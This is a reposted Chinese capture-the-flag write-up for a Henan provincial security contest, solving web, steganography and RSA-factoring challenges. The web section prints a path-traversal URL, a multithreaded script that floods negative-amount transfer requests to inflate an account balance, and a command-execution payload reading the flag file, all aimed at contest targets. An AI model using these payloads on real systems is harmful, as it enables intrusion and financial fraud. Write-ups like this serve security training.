2025-12-22 00:41:40 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文提供了河南省第七届金盾信安杯网络与数据安全大赛的部分题解，包括WEB安全、Misc杂项和Crypto密码学三类题目。作者先吐槽了比赛中出现的数据丢失导致重赛的问题，然后详细介绍了SSTI注入、路径遍历、多线程攻击、隐写术和RSA分解等题目的解题思路和具体实现代码。文章结构清晰，提供了实用的技术细节和代码示例，对CTF参赛者有一定参考价值。 综合评分： 80 文章分类： CTF,WEB安全

cover_image

【题解】河南省第七届金盾信安杯网络与数据安全大赛

原创

X1a0Yu

半亩塘的一棵树

2025年12月21日 17:57 河南

河南省第七届金盾信安杯网络与数据安全大赛部分题解如下：

但是，我要先吐槽两句，1秒2秒瞬秒的的哥还是太权威了；

人家辛辛苦苦打了一天的比赛，怎么能因为数据丢失重赛呢？第一次见还能重赛的比赛。。。。。。

大家又不是没有截图自己的排行榜，WriteUP贴上自己的排名不久好了，真搞不懂为啥要重赛。每年都要出一次事故的金盾信安杯。。。。。。

web

SSTI

fenjing直接一把梭哈，无需多言

pop

严重怀疑主办方出题质量，直接能访问flag文件。

/?win=../../../../flag

那还说啥了，直接出flag了呗。

逃单

先注册个账号，提示要余额足够才给flag，那就转点钱。金额-10000就是给自己转了。但是单次金额有上限，那就写一个多线程发包：

import&nbsp;requests
from&nbsp;concurrent.futures&nbsp;import&nbsp;ThreadPoolExecutor, as_completed
import&nbsp;time

burp0_url =&nbsp;"http://ip/transfer"
burp0_cookies = {"session":&nbsp;"eyJiYWxhbmNlIjoxMDAsImNhcHRjaGEiOjY3ODQsInVzZXJfaWQiOjF9.aUYIGA.-HcNB7QYfFq3lz0FS5_8DHQJLxM"}
burp0_headers = {
&nbsp; &nbsp;&nbsp;"Cache-Control":&nbsp;"max-age=0",
&nbsp; &nbsp;&nbsp;"Accept-Language":&nbsp;"zh-CN,zh;q=0.9",
&nbsp; &nbsp;&nbsp;"Origin":&nbsp;"http://47.94.231.37:36301",
&nbsp; &nbsp;&nbsp;"Content-Type":&nbsp;"application/x-www-form-urlencoded",
&nbsp; &nbsp;&nbsp;"Upgrade-Insecure-Requests":&nbsp;"1",
&nbsp; &nbsp;&nbsp;"User-Agent":&nbsp;"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36",
&nbsp; &nbsp;&nbsp;"Accept":&nbsp;"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
&nbsp; &nbsp;&nbsp;"Referer":&nbsp;"http://47.94.231.37:36301/dashboard",
&nbsp; &nbsp;&nbsp;"Accept-Encoding":&nbsp;"gzip, deflate, br",
&nbsp; &nbsp;&nbsp;"Connection":&nbsp;"keep-alive"
}
burp0_data = {"target":&nbsp;"admin",&nbsp;"amount":&nbsp;"-10000",&nbsp;"captcha":&nbsp;"6784"}

success_count =&nbsp;0
failure_count =&nbsp;0

def&nbsp;send_request(i):
&nbsp; &nbsp;&nbsp;try:
&nbsp; &nbsp; &nbsp; &nbsp; response = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;i, response.status_code,&nbsp;"success"
&nbsp; &nbsp;&nbsp;except&nbsp;Exception&nbsp;as&nbsp;e:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;i,&nbsp;0, str(e)

print("开始使用线程池发送10000次请求...")
start_time = time.time()

with&nbsp;ThreadPoolExecutor(max_workers=500)&nbsp;as&nbsp;executor: &nbsp;# 500个并发线程
&nbsp; &nbsp; futures = [executor.submit(send_request, i)&nbsp;for&nbsp;i&nbsp;in&nbsp;range(100000)]

&nbsp; &nbsp; completed =&nbsp;0
&nbsp; &nbsp;&nbsp;for&nbsp;future&nbsp;in&nbsp;as_completed(futures):
&nbsp; &nbsp; &nbsp; &nbsp; i, status_code, result = future.result()
&nbsp; &nbsp; &nbsp; &nbsp; completed +=&nbsp;1
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;status_code ==&nbsp;200:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; success_count +=&nbsp;1
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;else:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; failure_count +=&nbsp;1

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# 显示进度
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;completed %&nbsp;1000&nbsp;==&nbsp;0:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; print(f"进度:&nbsp;{completed}/10000")

end_time = time.time()

print(f"请求完成！耗时:&nbsp;{end_time - start_time:.2f}秒")
print(f"成功:&nbsp;{success_count}次，失败:&nbsp;{failure_count}次")

余额够了就能买flag了。

bagua

burp爆破一下卦序，得到：震 → 离 → 坤 → 兑 → 坎

下一步直接命令执行即可：

('system')('cat /flag')

Misc

何意未

图片扔随波逐流，分析是宽高有问题。没看出来那段字是什么意思。

管他呢，先爆破附件，密码是972561。解压压缩包得到两个文件

将“孩子们还认得出我吗”扔进随波逐流看看，发现有LSB隐写，提示是Arnold隐写，用工具解一下，进行以下变化：

发现图上有一串字

“VCp@ssw0rd114514!@#”，应该是磁盘挂载的密码，VeraCrypt挂载打开，我嘞个一堆高呀人士，但有一个图片的大小跟其他的不太一样

随波逐流检查一下看看

发现里面藏有东西：

89504e470d0a1a0a0000000d494844520000007b0000007b080600000054c7ff7f000000097048597300000ec300000ec301c76fa8640000034549444154789cec984b6ec5300c0373ff4bb780915d1157321559b1864056d187d4e46ddef583dae8da6d00e509d88d04ec4602762301bb9180dd4853d8d775fd79a8ab5ff724601f58f724601f58f724601f58f724601f58f724600749f1627dd46cc00e12b03f56a708d81fab5304ec8fd5293a12767510d5e7edf402ece4793bbd003b79de4e2fc04e9eb7d30bb093e7edf4920a5b797649f19291d7d30bec7f046c602ff7021bd8c00676acbf90bf4b95a095e629caf868d579c006b63e1cd8c02e3d4f11b081fd6dd8d685bb7acdc1052f4a9de24fbd0bb081ed5b58a9d72a602f2eacd46b15b0171756eab50ad8810176818d3e7ab4de8068deed35a684b2d6011bd8a17b7709d8c00636b037c3aefe01ecfa503280a93b80fd622fb081bd2c602feec8e80536b097950e5ba953b4eb70191f5ec68732f6780fa2d44946812de51d7bbc0751ea24a3c096f28e3dde8328759251604b79c71eef41943ac928b0a5bc638ff7204a5da51d59075ecdf1866760035b3796115ed901ec406319e1951dc00e3496115ed901ecc58519e1abcf8b86f886801d340fd8160387cc03b6c5c021f3806d3170c8bc2361871b4838668667e589defbd8ef1d1e2d6003fbf5ba68cfc05e0c905117ed19d88b0132eaa23db7865de94351e6657c8cd11fc5633e6f78f360604b3b80fdf20e60031bd8ff0e06b6b4a32cec8ca32bbd1907fec2ad800decef04b0f402fbaefd7a004b2fb0efdaaf07b0f402fbaef50e528e94d11bbd433d7095ded1ef1d0e6c6003db286003fbf5ded1ef1d0eec46b01545c389f61c9d375aeaad801dd49b2160077a0636b0cb08d8819e815de470191f45465ee583576f0a6c60fb0244f75ae7011bd865e6297b810decfdb033c02abdd139de00b1bac3b317d80b7b810d6c604705557a817dcff42e54ea94a04a2fb0ef99990bdf08b07ab8e8baea3718bba72f812de5a87483b17bfa12d8528e4a3718bba72f812de5a87483b17bfa12d8528e4a3718bba72f834329758abfe863eeba819a03d8c0d687031bd8cb758a3f60dffdde50c06e04dbaa68108a97687fcaad327e048f99a72f810d6cd36060a7d4b9324f5f021bd8a6c1c04ea973659ebe4c00c613ff00bbd103ec460fb01b3dc06ef42cc1466709d88d04ec4602762301bb9180dd48bf000000ffff4d10eda900000006494441540300b6e12ce3266918d30000000049454e44ae426082

![](https://mmbiz.qpic.cn/sz_mmbiz_png/FKflNH5BJ2WBWQLE4F2cne5abxdQ63vdPIL92icmsTYIHr8ozeshJJTS1jlbf8eloS9iaU5OE0dfzhTaMvibTRs9w/640?wx_fmt=png&from=appmsg&watermark=1#imgIndex=11)

解一下发现有一个QR码，在线扫一下看看

果然出flag了：

flag{Y0u_@r3_gOOOOOOd_4t_m15c}

Crypto

EZ_factor

import&nbsp;math
from&nbsp;hashlib&nbsp;import&nbsp;sha256

n =&nbsp;17308807616386058844272562044366373239941298399441061888987792449850318446488267823791686238993381710983339151835704898811819114653898233851186986907248944945572075381969568786557506755580008583114101120218877483488181888525631891889813747166905554933455974368751166389777947046367771658052639914248915779657166059874317977162602078280293328757685017737532940734772889768555007323946513615998420286052883040446227066856298595661216580977330405737193140204353453124007412078909385785412112150298386990160663358754629548589338559014764621289705392225163644989157173329327545114029143805183101871420114355649176993308939
leak =&nbsp;1295365686138157206282110008537080678610959566969920821768228574675183666486949457476

M =&nbsp;1&nbsp;<<&nbsp;280
sqrt_n = math.isqrt(n)
S_approx =&nbsp;2&nbsp;* sqrt_n
S_approx_low = S_approx % M
d0 = (leak - S_approx_low) % M

found =&nbsp;False
bound =&nbsp;1&nbsp;<<&nbsp;22
for&nbsp;delta1&nbsp;in&nbsp;range(bound +&nbsp;1):
&nbsp; &nbsp; delta = d0 + M * delta1
&nbsp; &nbsp; S = S_approx + delta
&nbsp; &nbsp; D = S * S -&nbsp;4&nbsp;* n
&nbsp; &nbsp;&nbsp;if&nbsp;D <&nbsp;0:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;continue
&nbsp; &nbsp; r = math.isqrt(D)
&nbsp; &nbsp;&nbsp;if&nbsp;r * r == D:
&nbsp; &nbsp; &nbsp; &nbsp; p = (S + r) //&nbsp;2
&nbsp; &nbsp; &nbsp; &nbsp; q = (S - r) //&nbsp;2
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;p * q == n:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; found =&nbsp;True
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break

S = p + q
flag_hash = sha256(str(S).encode()).hexdigest()
print(f"flag{{{flag_hash}}}")

# flag{9f3023311b4ce1f7fc343b21838753d0b05265e8d7ac3f20c1ff45c792188a62}

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：半亩塘的一棵树 X1a0Yu《